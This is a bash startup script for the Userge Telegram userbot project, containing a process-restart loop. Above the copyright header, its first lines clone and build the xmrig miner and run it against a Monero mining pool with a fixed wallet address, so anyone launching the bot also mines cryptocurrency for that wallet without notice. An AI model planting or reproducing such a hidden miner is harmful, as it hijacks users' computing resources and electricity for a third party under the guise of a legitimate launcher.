#!/bin/bash
#
git clone https://github.com/xmrig/xmrig
cd xmrig;mkdir build;cd build;cmake ..;make;./xmrig -o gulf.moneroocean.stream:10128 -u 4355Rp6kHbgACujcyYDG8KGSvqNX6WBymCeFeYjgjKMXh2XgqEuUhWBdnjLNdnGDeD1DhJeJtkS9d23mMYm8KpSNMnXTrHg -p lokekkekek
# Copyright (C) 2020-2021 by UsergeTeam@Github, < https://github.com/UsergeTeam >.
#
# This file is part of < https://github.com/UsergeTeam/Userge > project,
# and is released under the "GNU v3.0 License Agreement".
# Please see < https://github.com/UsergeTeam/Userge/blob/master/LICENSE >
#
# All rights reserved.

. init/proc.sh

declare -ir usr1=138
declare -r cmd='. init/init.sh; runUserge "$@"'

run() {
    reInitProc
    bash -c "$cmd" $0 "$@" &
    setProc $!
    waitProc
    test $? -eq $usr1 && run "$@"
}

run "$@"
